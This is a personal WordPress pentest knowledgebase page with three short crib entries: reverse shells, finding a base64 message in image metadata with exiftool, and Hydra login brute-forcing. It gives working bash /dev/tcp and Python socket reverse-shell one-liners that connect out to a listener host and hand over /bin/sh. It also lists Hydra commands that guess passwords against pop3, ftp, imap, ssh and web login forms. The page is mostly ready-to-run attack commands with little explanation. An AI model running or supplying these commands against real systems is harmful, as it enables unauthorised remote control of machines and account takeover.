Tikejhya: Ashish Nepal

Knowledgebase

Category: pentest

reverse shell

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
You have already voted.

steganography & exiftool

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Using steganography, secret messages can be embedded into images.

using exiftool to discover a base64 encoded message on the image metadata

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg

You have already voted.

hydra [by example]

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker which supports numerous protocols to attack.

 

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form “/path/index.php:key=^PASS^:invalid key” -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

quick tip: you may want to send two keys:; user=^USER^&pass=^PASS^:Bad login”
Host =172.28.128.5
Method = http-form-post
URL =/path/index.php
Form parameters =key=^PASS^
Failure response =invalid key
Users file = users.txt
Password file =/usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt

You have already voted.

Powered by WordPress & Theme by Anders Norén